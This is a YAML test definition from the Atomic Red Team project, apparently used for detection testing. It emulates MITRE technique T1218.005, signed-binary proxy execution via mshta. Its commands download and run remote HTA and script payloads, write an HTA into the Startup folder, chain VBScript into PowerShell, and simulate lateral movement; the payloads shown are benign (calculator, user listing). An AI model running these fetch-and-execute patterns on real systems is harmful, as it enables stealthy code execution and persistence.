security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1218.005/T1218.005.yaml
T
DelicateHug 96ee459edc Update T1218.005.yaml for windows 11 calculator (#3094) 
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Co-authored-by: dademola <dademola@hunit.(none)>
2025-04-08 11:34:32 -05:00

234 lines
10 KiB
YAML
Raw Permalink Blame History

attack_technique: T1218.005
display_name: 'Signed Binary Proxy Execution: Mshta'
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
auto_generated_guid: 1483fab9-4f52-4217-a9ce-daa9d7747cae
description: |
Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
supported_platforms:
- windows
input_arguments:
file_url:
description: location of the payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct
executor:
command: |
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
name: command_prompt
- name: Mshta executes VBScript to execute malicious command
auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095
description: |
Run a local VB script to run local user enumeration powershell command.
This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
Upon execution, a new PowerShell windows will be opened that displays user information.
supported_platforms:
- windows
executor:
command: |
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close")
name: command_prompt
- name: Mshta Executes Remote HTML Application (HTA)
auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45
description: |
Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
supported_platforms:
- windows
input_arguments:
temp_file:
description: temp_file location for hta
type: string
default: $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta
hta_url:
description: URL to HTA file for execution
type: string
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta
executor:
command: |
$var =Invoke-WebRequest "#{hta_url}"
$var.content|out-file "#{temp_file}"
mshta "#{temp_file}"
start-sleep -s 15
stop-process -name "calculator" -Force -ErrorAction Ignore
stop-process -name "CalculatorApp" -Force -ErrorAction Ignore
cleanup_command: |
remove-item "#{temp_file}" -ErrorAction Ignore
name: powershell
- name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
description: Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
supported_platforms:
- windows
input_arguments:
script_engine:
description: Script Engine to use
type: string
default: JScript
hta_file_path:
description: HTA file name and or path to be used
type: string
default: Test.hta
mshta_file_path:
description: Location of mshta.exe
type: string
default: $env:windir\system32\mshta.exe
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
executor:
command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}'
name: powershell
- name: Invoke HTML Application - Jscript Engine Simulating Double Click
auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
description: Executes an HTA Application using JScript script engine simulating double click.
supported_platforms:
- windows
input_arguments:
script_engine:
description: Script Engine to use
type: string
default: JScript
hta_file_path:
description: HTA file name and or path to be used
type: string
default: Test.hta
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
executor:
command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick'
name: powershell
- name: Invoke HTML Application - Direct download from URI
auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
description: Executes an HTA Application by directly downloading from remote URI.
supported_platforms:
- windows
input_arguments:
mshta_file_path:
description: Location of mshta.exe
type: string
default: $env:windir\system32\mshta.exe
hta_uri:
description: URI to HTA
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
executor:
command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
name: powershell
- name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
description: Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
supported_platforms:
- windows
input_arguments:
rundll32_file_path:
description: Location of rundll32.exe
type: path
default: $env:windir\system32\rundll32.exe
script_engine:
description: Script Engine to use
type: string
default: JScript
protocol_handler:
description: Protocol Handler to use
type: string
default: About
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
executor:
command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
name: powershell
- name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
description: Executes an HTA Application with JScript Engine and Inline Protocol Handler.
supported_platforms:
- windows
input_arguments:
mshta_file_path:
description: Location of mshta.exe
type: path
default: $env:windir\system32\mshta.exe
script_engine:
description: Script Engine to use
type: string
default: JScript
protocol_handler:
description: Protocol Handler to use
type: string
default: About
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
executor:
command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
name: powershell
- name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
description: Executes an HTA Application with Simulate lateral movement over UNC Path.
supported_platforms:
- windows
input_arguments:
mshta_file_path:
description: Location of mshta.exe
type: string
default: $env:windir\system32\mshta.exe
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
executor:
command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}'
name: powershell
- name: Mshta used to Execute PowerShell
auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772
description: |
Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.
supported_platforms:
- windows
input_arguments:
message:
description: Encoded message to include
type: string
default: Hello,%20MSHTA!
seconds_to_sleep:
description: How many seconds to sleep/wait
type: integer
default: 5
executor:
command: |
mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>'"
name: command_prompt
Reference in New Issue View Git Blame Copy Permalink